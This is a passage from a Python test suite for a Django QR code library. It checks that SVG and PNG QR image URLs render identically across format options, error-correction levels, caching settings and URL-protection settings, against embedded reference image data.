svg_result = b'<?xml version=\'1.0\' encoding=\'UTF-8\'?>\n<svg height="2.9mm" version="1.1" viewBox="0 0 2.9 2.9" width="2.9mm" xmlns="http://www.w3.org/2000/svg"><path d="M 2 1 L 2 1.1 L 2.1 1.1 L 2.1 1 z M 1.8 2.1 L 1.8 2.2 L 1.9 2.2 L 1.9 2.1 z M 1.6 0.5 L 1.6 0.6 L 1.7 0.6 L 1.7 0.5 z M 1.4 2.1 L 1.4 2.2 L 1.5 2.2 L 1.5 2.1 z M 0.4 2.4 L 0.4 2.5 L 0.5 2.5 L 0.5 2.4 z M 2 1.3 L 2 1.4 L 2.1 1.4 L 2.1 1.3 z M 1.8 0.8 L 1.8 0.9 L 1.9 0.9 L 1.9 0.8 z M 2.2 0.8 L 2.2 0.9 L 2.3 0.9 L 2.3 0.8 z M 1.7 2.1 L 1.7 2.2 L 1.8 2.2 L 1.8 2.1 z M 0.5 1 L 0.5 1.1 L 0.6 1.1 L 0.6 1 z M 0.4 1.4 L 0.4 1.5 L 0.5 1.5 L 0.5 1.4 z M 2.2 2.3 L 2.2 2.4 L 2.3 2.4 L 2.3 2.3 z M 1.2 0.9 L 1.2 1.0 L 1.3 1.0 L 1.3 0.9 z M 0.9 1.2 L 0.9 1.3 L 1.0 1.3 L 1.0 1.2 z M 0.8 0.4 L 0.8 0.5 L 0.9 0.5 L 0.9 0.4 z M 1.4 1.2 L 1.4 1.3 L 1.5 1.3 L 1.5 1.2 z M 1.3 0.4 L 1.3 0.5 L 1.4 0.5 L 1.4 0.4 z M 1.4 1.1 L 1.4 1.2 L 1.5 1.2 L 1.5 1.1 z M 2 0.7 L 2 0.8 L 2.1 0.8 L 2.1 0.7 z M 1 1.4 L 1 1.5 L 1.1 1.5 L 1.1 1.4 z M 1.6 1 L 1.6 1.1 L 1.7 1.1 L 1.7 1 z M 2.3 1.8 L 2.3 1.9 L 2.4 1.9 L 2.4 1.8 z M 2.1 0.6 L 2.1 0.7 L 2.2 0.7 L 2.2 0.6 z M 0.4 2.1 L 0.4 2.2 L 0.5 2.2 L 0.5 2.1 z M 1.8 0.5 L 1.8 0.6 L 1.9 0.6 L 1.9 0.5 z M 2.4 1.3 L 2.4 1.4 L 2.5 1.4 L 2.5 1.3 z M 2.2 1.3 L 2.2 1.4 L 2.3 1.4 L 2.3 1.3 z M 0.4 0.8 L 0.4 0.9 L 0.5 0.9 L 0.5 0.8 z M 2.4 0.8 L 2.4 0.9 L 2.5 0.9 L 2.5 0.8 z M 1.2 1.9 L 1.2 2.0 L 1.3 2.0 L 1.3 1.9 z M 0.8 1.4 L 0.8 1.5 L 0.9 1.5 L 0.9 1.4 z M 0.7 0.6 L 0.7 0.7 L 0.8 0.7 L 0.8 0.6 z M 0.6 1 L 0.6 1.1 L 0.7 1.1 L 0.7 1 z M 1.3 1.8 L 1.3 1.9 L 1.4 1.9 L 1.4 1.8 z M 1.2 0.6 L 1.2 0.7 L 1.3 0.7 L 1.3 0.6 z M 1 0.4 L 1 0.5 L 1.1 0.5 L 1.1 0.4 z M 0.8 2 L 0.8 2.1 L 0.9 2.1 L 0.9 2 z M 1.5 0.4 L 1.5 0.5 L 1.6 0.5 L 1.6 0.4 z M 1.3 2 L 1.3 2.1 L 1.4 2.1 L 1.4 2 z M 2 0.4 L 2 0.5 L 2.1 0.5 L 2.1 0.4 z M 2.1 1.7 L 2.1 1.8 L 2.2 1.8 L 2.2 1.7 z M 2 2.3 L 2 2.4 L 2.1 2.4 L 2.1 2.3 z M 1.8 0.6 L 1.8 0.7 L 1.9 0.7 L 1.9 0.6 z M 1.7 1.4 L 1.7 1.5 L 1.8 1.5 L 1.8 1.4 z M 0.6 2.1 L 0.6 2.2 L 0.7 2.2 L 0.7 2.1 z M 2.2 1.4 L 2.2 1.5 L 2.3 1.5 L 2.3 1.4 z M 0.4 0.5 L 0.4 0.6 L 0.5 0.6 L 0.5 0.5 z M 0.5 1.6 L 0.5 1.7 L 0.6 1.7 L 0.6 1.6 z M 1.2 1.6 L 1.2 1.7 L 1.3 1.7 L 1.3 1.6 z M 0.9 1.8 L 0.9 1.9 L 1.0 1.9 L 1.0 1.8 z M 0.7 2.2 L 0.7 2.3 L 0.8 2.3 L 0.8 2.2 z M 1.2 2.2 L 1.2 2.3 L 1.3 2.3 L 1.3 2.2 z M 1.5 1.9 L 1.5 2.0 L 1.6 2.0 L 1.6 1.9 z M 1.3 2.3 L 1.3 2.4 L 1.4 2.4 L 1.4 2.3 z M 1.9 2 L 1.9 2.1 L 2.0 2.1 L 2.0 2 z M 1.8 1.2 L 1.8 1.3 L 1.9 1.3 L 1.9 1.2 z M 1 2 L 1 2.1 L 1.1 2.1 L 1.1 2 z M 1.6 1.2 L 1.6 1.3 L 1.7 1.3 L 1.7 1.2 z M 2.4 2 L 2.4 2.1 L 2.5 2.1 L 2.5 2 z M 2.2 0.4 L 2.2 0.5 L 2.3 0.5 L 2.3 0.4 z M 2.1 1.2 L 2.1 1.3 L 2.2 1.3 L 2.2 1.2 z M 2.4 0.7 L 2.4 0.8 L 2.5 0.8 L 2.5 0.7 z M 0.6 2.2 L 0.6 2.3 L 0.7 2.3 L 0.7 2.2 z M 2.2 1.9 L 2.2 2.0 L 2.3 2.0 L 2.3 1.9 z M 0.4 1.8 L 0.4 1.9 L 0.5 1.9 L 0.5 1.8 z M 0.6 1.6 L 0.6 1.7 L 0.7 1.7 L 0.7 1.6 z M 0.7 2.1 L 0.7 2.2 L 0.8 2.2 L 0.8 2.1 z M 1 1.8 L 1 1.9 L 1.1 1.9 L 1.1 1.8 z M 1.5 1.4 L 1.5 1.5 L 1.6 1.5 L 1.6 1.4 z M 2.1 1 L 2.1 1.1 L 2.2 1.1 L 2.2 1 z M 1.8 0.9 L 1.8 1.0 L 1.9 1.0 L 1.9 0.9 z M 1.6 1.7 L 1.6 1.8 L 1.7 1.8 L 1.7 1.7 z M 2.1 1.5 L 2.1 1.6 L 2.2 1.6 L 2.2 1.5 z M 1.9 0.4 L 1.9 0.5 L 2.0 0.5 L 2.0 0.4 z M 2.4 0.4 L 2.4 0.5 L 2.5 0.5 L 2.5 0.4 z M 0.4 1.5 L 0.4 1.6 L 0.5 1.6 L 0.5 1.5 z M 0.7 1 L 0.7 1.1 L 0.8 1.1 L 0.8 1 z M 0.6 0.6 L 0.6 0.7 L 0.7 0.7 L 0.7 0.6 z M 0.5 1.4 L 0.5 1.5 L 0.6 1.5 L 0.6 1.4 z M 1.2 1 L 1.2 1.1 L 1.3 1.1 L 1.3 1 z M 1.3 1.1 L 1.3 1.2 L 1.4 1.2 L 1.4 1.1 z M 1 0.8 L 1 0.9 L 1.1 0.9 L 1.1 0.8 z M 1.5 0.8 L 1.5 0.9 L 1.6 0.9 L 1.6 0.8 z M 1.4 0.8 L 1.4 0.9 L 1.5 0.9 L 1.5 0.8 z M 1.3 2.4 L 1.3 2.5 L 1.4 2.5 L 1.4 2.4 z M 2 0.8 L 2 0.9 L 2.1 0.9 L 2.1 0.8 z M 1.6 1.1 L 1.6 1.2 L 1.7 1.2 L 1.7 1.1 z M 0.4 2.2 L 0.4 2.3 L 0.5 2.3 L 0.5 2.2 z M 1.8 1 L 1.8 1.1 L 1.9 1.1 L 1.9 1 z M 1.6 2.2 L 1.6 2.3 L 1.7 2.3 L 1.7 2.2 z M 2.2 1 L 2.2 1.1 L 2.3 1.1 L 2.3 1 z M 0.4 0.9 L 0.4 1.0 L 0.5 1.0 L 0.5 0.9 z M 1.7 2.3 L 1.7 2.4 L 1.8 2.4 L 1.8 2.3 z M 2.4 0.9 L 2.4 1.0 L 2.5 1.0 L 2.5 0.9 z M 0.5 0.4 L 0.5 0.5 L 0.6 0.5 L 0.6 0.4 z M 0.4 1.2 L 0.4 1.3 L 0.5 1.3 L 0.5 1.2 z M 1.3 1.7 L 1.3 1.8 L 1.4 1.8 L 1.4 1.7 z M 1.2 0.7 L 1.2 0.8 L 1.3 0.8 L 1.3 0.7 z M 0.8 1 L 0.8 1.1 L 0.9 1.1 L 0.9 1 z M 1 0.5 L 1 0.6 L 1.1 0.6 L 1.1 0.5 z M 0.8 2.1 L 0.8 2.2 L 0.9 2.2 L 0.9 2.1 z M 1.8 1.6 L 1.8 1.7 L 1.9 1.7 L 1.9 1.6 z M 0.9 2.4 L 0.9 2.5 L 1.0 2.5 L 1.0 2.4 z M 1.6 0.8 L 1.6 0.9 L 1.7 0.9 L 1.7 0.8 z M 1 2.4 L 1 2.5 L 1.1 2.5 L 1.1 2.4 z M 1.4 2.4 L 1.4 2.5 L 1.5 2.5 L 1.5 2.4 z M 1.5 2.4 L 1.5 2.5 L 1.6 2.5 L 1.6 2.4 z M 1.9 1.3 L 1.9 1.4 L 2.0 1.4 L 2.0 1.3 z M 1.8 0.7 L 1.8 0.8 L 1.9 0.8 L 1.9 0.7 z M 1.7 1.3 L 1.7 1.4 L 1.8 1.4 L 1.8 1.3 z M 2 2.4 L 2 2.5 L 2.1 2.5 L 2.1 2.4 z M 2.2 1.5 L 2.2 1.6 L 2.3 1.6 L 2.3 1.5 z M 0.4 0.6 L 0.4 0.7 L 0.5 0.7 L 0.5 0.6 z M 2.1 2.1 L 2.1 2.2 L 2.2 2.2 L 2.2 2.1 z M 1.2 1.7 L 1.2 1.8 L 1.3 1.8 L 1.3 1.7 z M 0.8 1.2 L 0.8 1.3 L 0.9 1.3 L 0.9 1.2 z M 0.7 0.4 L 0.7 0.5 L 0.8 0.5 L 0.8 0.4 z M 0.6 1.2 L 0.6 1.3 L 0.7 1.3 L 0.7 1.2 z M 1.3 1.2 L 1.3 1.3 L 1.4 1.3 L 1.4 1.2 z M 1.4 1.9 L 1.4 2.0 L 1.5 2.0 L 1.5 1.9 z M 1 0.6 L 1 0.7 L 1.1 0.7 L 1.1 0.6 z M 1.3 2.2 L 1.3 2.3 L 1.4 2.3 L 1.4 2.2 z M 1.8 1.3 L 1.8 1.4 L 1.9 1.4 L 1.9 1.3 z M 1 2.1 L 1 2.2 L 1.1 2.2 L 1.1 2.1 z M 1.6 1.3 L 1.6 1.4 L 1.7 1.4 L 1.7 1.3 z M 0.5 2.4 L 0.5 2.5 L 0.6 2.5 L 0.6 2.4 z M 2.1 1.9 L 2.1 2.0 L 2.2 2.0 L 2.2 1.9 z M 2 2.1 L 2 2.2 L 2.1 2.2 L 2.1 2.1 z M 1.7 1.6 L 1.7 1.7 L 1.8 1.7 L 1.8 1.6 z M 2.4 1.6 L 2.4 1.7 L 2.5 1.7 L 2.5 1.6 z M 1.6 2.4 L 1.6 2.5 L 1.7 2.5 L 1.7 2.4 z M 0.4 1.9 L 0.4 2.0 L 0.5 2.0 L 0.5 1.9 z M 0.7 1.4 L 0.7 1.5 L 0.8 1.5 L 0.8 1.4 z M 0.5 1.8 L 0.5 1.9 L 0.6 1.9 L 0.6 1.8 z M 1.3 1.5 L 1.3 1.6 L 1.4 1.6 L 1.4 1.5 z M 0.9 0.4 L 0.9 0.5 L 1.0 0.5 L 1.0 0.4 z M 0.7 2 L 0.7 2.1 L 0.8 2.1 L 0.8 2 z M 1.4 0.4 L 1.4 0.5 L 1.5 0.5 L 1.5 0.4 z M 1.2 2 L 1.2 2.1 L 1.3 2.1 L 1.3 2 z M 1 1.9 L 1 2.0 L 1.1 2.0 L 1.1 1.9 z M 2 1.5 L 2 1.6 L 2.1 1.6 L 2.1 1.5 z M 1.8 1.4 L 1.8 1.5 L 1.9 1.5 L 1.9 1.4 z M 1 2.2 L 1 2.3 L 1.1 2.3 L 1.1 2.2 z M 1.6 1.8 L 1.6 1.9 L 1.7 1.9 L 1.7 1.8 z M 2.3 1 L 2.3 1.1 L 2.4 1.1 L 2.4 1 z M 2.2 0.6 L 2.2 0.7 L 2.3 0.7 L 2.3 0.6 z M 2.1 1.4 L 2.1 1.5 L 2.2 1.5 L 2.2 1.4 z M 1.7 1.9 L 1.7 2.0 L 1.8 2.0 L 1.8 1.9 z M 2.4 0.5 L 2.4 0.6 L 2.5 0.6 L 2.5 0.5 z M 0.6 2.4 L 0.6 2.5 L 0.7 2.5 L 0.7 2.4 z M 0.7 1.3 L 0.7 1.4 L 0.8 1.4 L 0.8 1.3 z M 0.6 0.7 L 0.6 0.8 L 0.7 0.8 L 0.7 0.7 z M 1.2 1.1 L 1.2 1.2 L 1.3 1.2 L 1.3 1.1 z M 0.8 0.6 L 0.8 0.7 L 0.9 0.7 L 0.9 0.6 z M 0.6 1.8 L 0.6 1.9 L 0.7 1.9 L 0.7 1.8 z M 1 0.9 L 1 1.0 L 1.1 1.0 L 1.1 0.9 z M 1.5 1.1 L 1.5 1.2 L 1.6 1.2 L 1.6 1.1 z M 1.4 0.9 L 1.4 1.0 L 1.5 1.0 L 1.5 0.9 z M 1 1.2 L 1 1.3 L 1.1 1.3 L 1.1 1.2 z M 1.8 2 L 1.8 2.1 L 1.9 2.1 L 1.9 2 z M 2.3 2 L 2.3 2.1 L 2.4 2.1 L 2.4 2 z M 2.1 0.4 L 2.1 0.5 L 2.2 0.5 L 2.2 0.4 z M 2 1.2 L 2 1.3 L 2.1 1.3 L 2.1 1.2 z M 0.4 2.3 L 0.4 2.4 L 0.5 2.4 L 0.5 2.3 z M 1.6 2.3 L 1.6 2.4 L 1.7 2.4 L 1.7 2.3 z M 0.4 1 L 0.4 1.1 L 0.5 1.1 L 0.5 1 z M 1.9 1 L 1.9 1.1 L 2.0 1.1 L 2.0 1 z M 2.4 1 L 2.4 1.1 L 2.5 1.1 L 2.5 1 z M 2.2 2.2 L 2.2 2.3 L 2.3 2.3 L 2.3 2.2 z M 0.7 0.8 L 0.7 0.9 L 0.8 0.9 L 0.8 0.8 z M 0.6 0.8 L 0.6 0.9 L 0.7 0.9 L 0.7 0.8 z M 1.3 1.6 L 1.3 1.7 L 1.4 1.7 L 1.4 1.6 z M 1.2 0.8 L 1.2 0.9 L 1.3 0.9 L 1.3 0.8 z M 1.4 1.5 L 1.4 1.6 L 1.5 1.6 L 1.5 1.5 z M 1 1 L 1 1.1 L 1.1 1.1 L 1.1 1 z M 0.9 1 L 0.9 1.1 L 1.0 1.1 L 1.0 1 z M 0.8 2.2 L 0.8 2.3 L 0.9 2.3 L 0.9 2.2 z M 1.5 0.6 L 1.5 0.7 L 1.6 0.7 L 1.6 0.6 z M 1.4 1 L 1.4 1.1 L 1.5 1.1 L 1.5 1 z M 2 0.6 L 2 0.7 L 2.1 0.7 L 2.1 0.6 z M 1.6 0.9 L 1.6 1.0 L 1.7 1.0 L 1.7 0.9 z M 2.1 0.7 L 2.1 0.8 L 2.2 0.8 L 2.2 0.7 z M 1.9 1.2 L 1.9 1.3 L 2.0 1.3 L 2.0 1.2 z M 1.8 0.4 L 1.8 0.5 L 1.9 0.5 L 1.9 0.4 z M 0.4 2 L 0.4 2.1 L 0.5 2.1 L 0.5 2 z M 1.6 2 L 1.6 2.1 L 1.7 2.1 L 1.7 2 z M 2.3 0.4 L 2.3 0.5 L 2.4 0.5 L 2.4 0.4 z M 2.2 1.2 L 2.2 1.3 L 2.3 1.3 L 2.3 1.2 z M 0.4 0.7 L 0.4 0.8 L 0.5 0.8 L 0.5 0.7 z M 0.7 1.8 L 0.7 1.9 L 0.8 1.9 L 0.8 1.8 z M 0.8 1.3 L 0.8 1.4 L 0.9 1.4 L 0.9 1.3 z M 0.7 0.7 L 0.7 0.8 L 0.8 0.8 L 0.8 0.7 z M 0.6 1.3 L 0.6 1.4 L 0.7 1.4 L 0.7 1.3 z M 1.3 1.9 L 1.3 2.0 L 1.4 2.0 L 1.4 1.9 z M 0.9 1.6 L 0.9 1.7 L 1.0 1.7 L 1.0 1.6 z M 0.8 0.8 L 0.8 0.9 L 0.9 0.9 L 0.9 0.8 z M 0.7 2.4 L 0.7 2.5 L 0.8 2.5 L 0.8 2.4 z M 1.4 1.6 L 1.4 1.7 L 1.5 1.7 L 1.5 1.6 z M 1.2 2.4 L 1.2 2.5 L 1.3 2.5 L 1.3 2.4 z M 1 0.7 L 1 0.8 L 1.1 0.8 L 1.1 0.7 z M 1.3 2.1 L 1.3 2.2 L 1.4 2.2 L 1.4 2.1 z M 1.9 2.2 L 1.9 2.3 L 2.0 2.3 L 2.0 2.2 z M 1.8 1.8 L 1.8 1.9 L 1.9 1.9 L 1.9 1.8 z M 2.3 1.4 L 2.3 1.5 L 2.4 1.5 L 2.4 1.4 z M 1.9 1.9 L 1.9 2.0 L 2.0 2.0 L 2.0 1.9 z M 1.7 1.5 L 1.7 1.6 L 1.8 1.6 L 1.8 1.5 z M 0.6 2 L 0.6 2.1 L 0.7 2.1 L 0.7 2 z M 0.4 0.4 L 0.4 0.5 L 0.5 0.5 L 0.5 0.4 z M 2.1 2.3 L 2.1 2.4 L 2.2 2.4 L 2.2 2.3 z M 0.8 1.8 L 0.8 1.9 L 0.9 1.9 L 0.9 1.8 z M 1.4 0.5 L 1.4 0.6 L 1.5 0.6 L 1.5 0.5 z M 1.2 2.1 L 1.2 2.2 L 1.3 2.2 L 1.3 2.1 z M 1 1.6 L 1 1.7 L 1.1 1.7 L 1.1 1.6 z M 1.8 2.4 L 1.8 2.5 L 1.9 2.5 L 1.9 2.4 z M 0.8 2.4 L 0.8 2.5 L 0.9 2.5 L 0.9 2.4 z M 1.5 1.6 L 1.5 1.7 L 1.6 1.7 L 1.6 1.6 z M 2.3 2.4 L 2.3 2.5 L 2.4 2.5 L 2.4 2.4 z M 2.1 0.8 L 2.1 0.9 L 2.2 0.9 L 2.2 0.8 z M 1.1 1.3 L 1.1 1.4 L 1.2 1.4 L 1.2 1.3 z M 1.9 2.1 L 1.9 2.2 L 2.0 2.2 L 2.0 2.1 z M 1 2.3 L 1 2.4 L 1.1 2.4 L 1.1 2.3 z M 1.6 1.9 L 1.6 2.0 L 1.7 2.0 L 1.7 1.9 z M 2.2 0.7 L 2.2 0.8 L 2.3 0.8 L 2.3 0.7 z M 2.1 1.3 L 2.1 1.4 L 2.2 1.4 L 2.2 1.3 z M 2.4 0.6 L 2.4 0.7 L 2.5 0.7 L 2.5 0.6 z M 2.2 1.8 L 2.2 1.9 L 2.3 1.9 L 2.3 1.8 z M 0.7 1.2 L 0.7 1.3 L 0.8 1.3 L 0.8 1.2 z M 0.6 0.4 L 0.6 0.5 L 0.7 0.5 L 0.7 0.4 z M 0.8 0.7 L 0.8 0.8 L 0.9 0.8 L 0.9 0.7 z M 1.3 0.9 L 1.3 1.0 L 1.4 1.0 L 1.4 0.9 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none" /></svg>'
png_result = b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x1d\x00\x00\x00\x1d\x01\x00\x00\x00\x00~\xe8Z\xa2\x00\x00\x00\x83IDATx\x9cm\xcd1\x0e\x01Q\x10\x80\xe1\x7f\xc6&:j\x07\x90,\x9db\x0f q\x0e\x8e \x91H\x88\x08\xb7\xa0\xd3ju.\xa0\xd7\x8aj[\x95e\x937\x13\xd6Sj4_\xfbI\x04W\x80\x1fI\x91\xee\x8fZ?\xed\xd0j>A\x11P\xaa5Z[6P\x1f\xe4\x10\xef+\xa3l\xf5\x8d\xf7Xf<\x86[#\xf8\xc1\xc47\xcd\x0b\xf1\xb90-\xd2\x1c\xc2\xb9cR\x8e^\xdd\x84O6U\xf4\x06\xe1\xda3\xf5\xac\x8d\xfc\xc9\xbfO\x8703\xef(\x96\xc2\x00\x00\x00\x00IEND\xaeB`\x82'
def test_svg_url(self):
for cache_enabled in [True, False]:
url1 = make_qr_code_url(TEST_TEXT, QRCodeOptions(size=1), cache_enabled=cache_enabled)
url2 = qr_url_from_text(TEST_TEXT, size=1, cache_enabled=cache_enabled)
url3 = qr_url_from_text(TEST_TEXT, image_format='svg', size=1, cache_enabled=cache_enabled)
url4 = qr_url_from_text(TEST_TEXT, image_format='SVG', size=1, cache_enabled=cache_enabled)
url5 = qr_url_from_text(TEST_TEXT, options=QRCodeOptions(image_format='SVG', size=1), cache_enabled=cache_enabled)
# Using an invalid image format should fallback to SVG.
url6 = qr_url_from_text(TEST_TEXT, image_format='invalid-format-name', size=1, cache_enabled=cache_enabled)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4, url5, url6)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
self.assertEqual(urls[0], urls[4])
self.assertEqual(urls[0], urls[5])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, TestQRUrlFromTextResult.svg_result)
def test_png_url(self):
for cache_enabled in [True, False]:
url1 = make_qr_code_url(TEST_TEXT, QRCodeOptions(image_format='png', size=1), cache_enabled=cache_enabled)
url2 = qr_url_from_text(TEST_TEXT, image_format='png', size=1, cache_enabled=cache_enabled)
url3 = qr_url_from_text(TEST_TEXT, image_format='PNG', size=1, cache_enabled=cache_enabled)
url4 = qr_url_from_text(TEST_TEXT, options=QRCodeOptions(image_format='PNG', size=1), cache_enabled=cache_enabled)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, TestQRUrlFromTextResult.png_result)
@override_settings(CACHES=OVERRIDE_CACHES_SETTING, QR_CODE_CACHE_ALIAS=None)
def test_svg_with_cache_but_no_alias(self):
self.test_svg_url()
@override_settings(CACHES=OVERRIDE_CACHES_SETTING)
def test_png_with_cache(self):
self.test_png_url()
@override_settings(CACHES=OVERRIDE_CACHES_SETTING, QR_CODE_CACHE_ALIAS=None)
def test_png_with_cache_but_no_alias(self):
self.test_png_url()
@override_settings(QR_CODE_URL_PROTECTION=dict(TOKEN_LENGTH=30, SIGNING_KEY='my-secret-signing-key',
SIGNING_SALT='my-signing-salt',
ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=True))
def test_with_url_protection_settings_1(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
# Registered users can access the URL externally, but since we are not logged in, we must expect an HTTP 403.
self.assertEqual(response.status_code, 403)
@override_settings(QR_CODE_URL_PROTECTION=dict(ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=False))
def test_with_url_protection_settings_2(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
self.assertEqual(response.status_code, 403)
@override_settings(QR_CODE_URL_PROTECTION=dict(ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=lambda user: False))
def test_with_url_protection_settings_3(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
self.assertEqual(response.status_code, 403)
@override_settings(QR_CODE_URL_PROTECTION=dict(ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER=lambda user: True))
def test_with_url_protection_settings_4(self):
self.test_svg_url()
self.test_png_url()
response = self.client.get(make_qr_code_url(TEST_TEXT, include_url_protection_token=False, cache_enabled=False))
# The callable for ALLOWS_EXTERNAL_REQUESTS_FOR_REGISTERED_USER always return True, event for anonymous user.
# Therefore, we must expect an HTTP 403.
self.assertEqual(response.status_code, 200)
def test_svg_error_correction(self):
for correction_level in ERROR_CORRECTION_DICT:
print('Testing SVG URL with error correction: %s' % correction_level)
url1 = make_qr_code_url(COMPLEX_TEST_TEXT, QRCodeOptions(error_correction=correction_level), cache_enabled=False)
url2 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, cache_enabled=False)
url3 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='svg', cache_enabled=False)
url4 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='SVG', cache_enabled=False)
url5 = qr_url_from_text(COMPLEX_TEST_TEXT, options=QRCodeOptions(error_correction=correction_level, image_format='SVG'), cache_enabled=False)
# Using an invalid image format should fallback to SVG.
url6 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='invalid-format-name', cache_enabled=False)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4, url5, url6)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
self.assertEqual(urls[0], urls[4])
self.assertEqual(urls[0], urls[5])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
source_image_data = response.content.decode('utf-8')
# Skip header and adjust tag format.
source_image_data = source_image_data[source_image_data.index('\n') + 1:]
source_image_data = _make_closing_path_tag(source_image_data)
ref_image_data = get_svg_content_from_file_name('qrfromtextsvgresult_error_correction_%s%s' % (correction_level.lower(), SVG_REF_SUFFIX), skip_header=False)
self.assertEqual(source_image_data, ref_image_data)
def test_png_error_correction(self):
for correction_level in ERROR_CORRECTION_DICT:
print('Testing PNG URL with error correction: %s' % correction_level)
url1 = make_qr_code_url(COMPLEX_TEST_TEXT, QRCodeOptions(error_correction=correction_level, image_format='png'), cache_enabled=False)
url2 = make_qr_code_url(COMPLEX_TEST_TEXT, QRCodeOptions(error_correction=correction_level, image_format='PNG'), cache_enabled=False)
url3 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='png', cache_enabled=False)
url4 = qr_url_from_text(COMPLEX_TEST_TEXT, error_correction=correction_level, image_format='PNG', cache_enabled=False)
url5 = qr_url_from_text(COMPLEX_TEST_TEXT, options=QRCodeOptions(error_correction=correction_level, image_format='PNG'), cache_enabled=False)
url = url1
token_regex = re.compile(r"token=.+&?")
urls = list(map(lambda x: token_regex.sub('', x), (url1, url2, url3, url4, url5)))
self.assertEqual(urls[0], urls[1])
self.assertEqual(urls[0], urls[2])
self.assertEqual(urls[0], urls[3])
self.assertEqual(urls[0], urls[4])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
source_image_data = response.content
ref_image_data = get_png_content_from_file_name('qrfromtextpngresult_error_correction_%s%s' % (correction_level.lower(), PNG_REF_SUFFIX))
self.assertEqual(source_image_data, ref_image_data)
class TestQRFromTextSvgResult(SimpleTestCase):
"""
Ensures that produced QR codes in SVG format coincide with verified references.
The tests cover direct call to tag function, rendering of tag, and direct call to qr_code API.
"""
def test_size(self):
sizes = ['t', 'T', 's', 'S', None, -1, 0, 'm', 'M', 'l', 'L', 'h', 'H', '6', 6, '8', 8]
rt = """<svg height="17.4mm" version="1.1" viewBox="0 0 17.4 17.4" width="17.4mm" xmlns="http://www.w3.org/2000/svg"><path d="M 12 6 L 12 6.6 L 12.6 6.6 L 12.6 6 z M 10.8 12.6 L 10.8 13.2 L 11.4 13.2 L 11.4 12.6 z M 9.6 3 L 9.6 3.6 L 10.2 3.6 L 10.2 3 z M 8.4 12.6 L 8.4 13.2 L 9.0 13.2 L 9.0 12.6 z M 2.4 14.4 L 2.4 15.0 L 3.0 15.0 L 3.0 14.4 z M 12 7.8 L 12 8.4 L 12.6 8.4 L 12.6 7.8 z M 10.8 4.8 L 10.8 5.4 L 11.4 5.4 L 11.4 4.8 z M 13.2 4.8 L 13.2 5.4 L 13.8 5.4 L 13.8 4.8 z M 10.2 12.6 L 10.2 13.2 L 10.8 13.2 L 10.8 12.6 z M 3 6 L 3 6.6 L 3.6 6.6 L 3.6 6 z M 2.4 8.4 L 2.4 9.0 L 3.0 9.0 L 3.0 8.4 z M 13.2 13.8 L 13.2 14.4 L 13.8 14.4 L 13.8 13.8 z M 7.2 5.4 L 7.2 6.0 L 7.8 6.0 L 7.8 5.4 z M 5.4 7.2 L 5.4 7.8 L 6.0 7.8 L 6.0 7.2 z M 4.8 2.4 L 4.8 3.0 L 5.4 3.0 L 5.4 2.4 z M 8.4 7.2 L 8.4 7.8 L 9.0 7.8 L 9.0 7.2 z M 7.8 2.4 L 7.8 3.0 L 8.4 3.0 L 8.4 2.4 z M 8.4 6.6 L 8.4 7.2 L 9.0 7.2 L 9.0 6.6 z M 12 4.2 L 12 4.8 L 12.6 4.8 L 12.6 4.2 z M 6 8.4 L 6 9.0 L 6.6 9.0 L 6.6 8.4 z M 9.6 6 L 9.6 6.6 L 10.2 6.6 L 10.2 6 z M 13.8 10.8 L 13.8 11.4 L 14.4 11.4 L 14.4 10.8 z M 12.6 3.6 L 12.6 4.2 L 13.2 4.2 L 13.2 3.6 z M 2.4 12.6 L 2.4 13.2 L 3.0 13.2 L 3.0 12.6 z M 10.8 3 L 10.8 3.6 L 11.4 3.6 L 11.4 3 z M 14.4 7.8 L 14.4 8.4 L 15.0 8.4 L 15.0 7.8 z M 13.2 7.8 L 13.2 8.4 L 13.8 8.4 L 13.8 7.8 z M 2.4 4.8 L 2.4 5.4 L 3.0 5.4 L 3.0 4.8 z M 14.4 4.8 L 14.4 5.4 L 15.0 5.4 L 15.0 4.8 z M 7.2 11.4 L 7.2 12.0 L 7.8 12.0 L 7.8 11.4 z M 4.8 8.4 L 4.8 9.0 L 5.4 9.0 L 5.4 8.4 z M 4.2 3.6 L 4.2 4.2 L 4.8 4.2 L 4.8 3.6 z M 3.6 6 L 3.6 6.6 L 4.2 6.6 L 4.2 6 z M 7.8 10.8 L 7.8 11.4 L 8.4 11.4 L 8.4 10.8 z M 7.2 3.6 L 7.2 4.2 L 7.8 4.2 L 7.8 3.6 z M 6 2.4 L 6 3.0 L 6.6 3.0 L 6.6 2.4 z M 4.8 12 L 4.8 12.6 L 5.4 12.6 L 5.4 